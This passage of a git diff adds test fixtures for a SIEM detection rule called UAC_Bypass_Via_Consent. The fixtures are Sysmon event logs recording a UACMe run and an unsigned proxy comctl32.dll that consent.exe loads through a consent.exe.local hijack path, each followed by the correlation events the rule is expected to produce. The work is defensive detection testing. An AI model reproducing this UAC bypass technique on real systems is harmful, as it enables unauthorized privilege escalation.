AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC3D0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00107a250601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7472", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.760Z", "type": "raw", "uuid": "4358e286-1ee5-4521-af33-0ede7dac5ef4"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8183818Z\"},\"EventRecordID\":\"5438\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - UAC Bypass UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.721\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\comctl32.dll\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2019-08-03 12:08:13.721\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - UAC Bypass UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\temp\\comctl32.dll", "object.name": "comctl32.dll", "object.path": "c:\\users\\ieuser\\appdata\\local\\temp\\", "object.property": "creation time", "object.value": "2019-08-03T12:08:13.721Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\explorer.exe", "subject.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "subject.process.id": "5336", "subject.process.name": "explorer.exe", "subject.process.path": "c:\\windows\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.721Z", "type": "raw", "uuid": "114bdb77-3e56-4e56-91f1-c348231ab6e7"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.6360892Z\"},\"EventRecordID\":\"5437\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.624\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.9.1905\"},{\"Name\":\"Description\",\"text\":\"UACMe main module\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"CommandLine\",\"text\":\"UACME.exe 22\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9E57914D39FBFE785C915E225011892613C4714C,MD5=D57E778DF10F801F47119A04BE990FFD,SHA256=D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378,IMPHASH=B6789EDFE23DDA911AE37C87444D3DCB\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5a29-5d45-0000-0010deb99000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5780\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "UACME.exe 22", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.hash.imphash": "B6789EDFE23DDA911AE37C87444D3DCB", "object.process.hash.md5": "D57E778DF10F801F47119A04BE990FFD", "object.process.hash.sha1": "9E57914D39FBFE785C915E225011892613C4714C", "object.process.hash.sha256": "D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378", "object.process.id": "5336", "object.process.meta": "Description:UACMe main module | Product:UACMe | Company:Hazardous Environments", "object.process.name": "uacme.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-5a29-5d45-0000-0010deb99000", "object.process.parent.id": "5780", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "3.1.9.1905", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.624Z", "type": "raw", "uuid": "a82cad3b-7c34-44ff-afea-535b46c1e49e"} -# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 2 {"correlation_name": "UAC_Bypass_Via_Consent"} \ No newline at end of file +expect 2 {"action": "start", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UAC_Bypass_Via_Consent", "correlation_type": "event", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UAC_Bypass_Via_Consent|msedgewin10|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.session_id": "999", "subject.process.cwd": "C:\\Windows\\system32\\", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "subject.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "subject.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "subject.process.name": "consent.exe", "subject.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "subject.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "subject.process.parent.id": "896", "subject.process.parent.name": "svchost.exe", "subject.process.parent.path": "c:\\windows\\system32\\", "subject.process.path": "c:\\windows\\system32\\", "subject.process.version": "10.0.17763.1 (WinBuild.160101.0800)"} + \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc new file mode 100644 index 00000000..fbcb7478 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc @@ -0,0 +1,6 @@ +{"_checkpoint": 57615712018, "_meta": {"id": "01da0c7e-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:02:22.4660000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:02:22.480032900Z\"},\"EventRecordID\":\"800891\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:02:22.466\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\\\comctl32.dll\",\"Name\":\"ImageLoaded\"},{\"text\":\"3.1.8.1904\",\"Name\":\"FileVersion\"},{\"text\":\"UACMe proxy DLL\",\"Name\":\"Description\"},{\"text\":\"UACMe\",\"Name\":\"Product\"},{\"text\":\"Hazardous Environments\",\"Name\":\"Company\"},{\"text\":\"Ikazuchi.dll\",\"Name\":\"OriginalFileName\"},{\"text\":\"MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\",\"Name\":\"Hashes\"},{\"text\":\"false\",\"Name\":\"Signed\"},{\"text\":\"-\",\"Name\":\"Signature\"},{\"text\":\"Unavailable\",\"Name\":\"SignatureStatus\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "datafield10": "Ikazuchi.dll", "datafield2": "2328", "datafield3": "c:\\windows\\system32\\", "datafield4": "consent.exe", "datafield6": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "datafield7": "20fff121-f8dd-647d-8401-000000003900", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.account.provider": "local", "object.name": "comctl32.dll", "object.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "object.process.hash": "IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.original_name": "Ikazuchi.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "20fff121-f8dd-647d-8401-000000003900", "subject.process.id": "2328", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:02:22.466Z", "uuid": "01da0c7e-03b2-01ee-8c68-005056825a53"} +{"_checkpoint": 57615712010, "_meta": {"id": "01da0c76-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:01:49.2630000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:01:49.265081800Z\"},\"EventRecordID\":\"800883\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:01:49.263\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.3232 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Consent UI for administrative applications\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"consent.exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"consent.exe 368 272 00000285D6BE22C0\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{20fff121-f3f7-647d-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"1\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=C67713C28BB97E685FEB88FFAEB96788,SHA256=6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C,IMPHASH=1275A84E15AAA739F3099F6A73D7D6FA\",\"Name\":\"Hashes\"},{\"text\":\"{20fff121-f3f8-647d-1300-000000003900}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"368\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"Name\":\"ParentImage\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield10": "consent.exe", "datafield19": "consent.exe (2328) ← svchost.exe (368) ← services.exe (648) ← wininit.exe (520) ← smss.exe (408) ← smss.exe (324)", "datafield2": "368", "datafield3": "c:\\windows\\system32\\", "datafield4": "svchost.exe", "datafield5": "consent.exe 368 272 00000285D6BE22C0", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "datafield7": "999", "datafield8": "20fff121-f8dd-647d-8401-000000003900", "datafield9": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.provider": "local", "object.account.session_id": "999", "object.hash": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.id": "2328", "object.name": "consent.exe", "object.path": "c:\\windows\\system32\\", "object.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "object.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "20fff121-f8dd-647d-8401-000000003900", "object.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.hash.imphash": "1275A84E15AAA739F3099F6A73D7D6FA", "object.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "object.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.id": "2328", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "object.process.parent.id": "368", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.3232 (WinBuild.160101.0800)", "object.property": "metadata", "object.value": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.version": "10.0.17763.3232 (WinBuild.160101.0800)", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.domain": "nt authority", "subject.name": "system", "subject.state": "on behalf of oneself", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:01:49.263Z", "uuid": "01da0c76-03b2-01ee-8c68-005056825a53"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.key": "consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UAC_Bypass_Via_Consent", "correlation_type": "event", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UAC_Bypass_Via_Consent|wks05.example.com|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "object.process.hash": "IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B 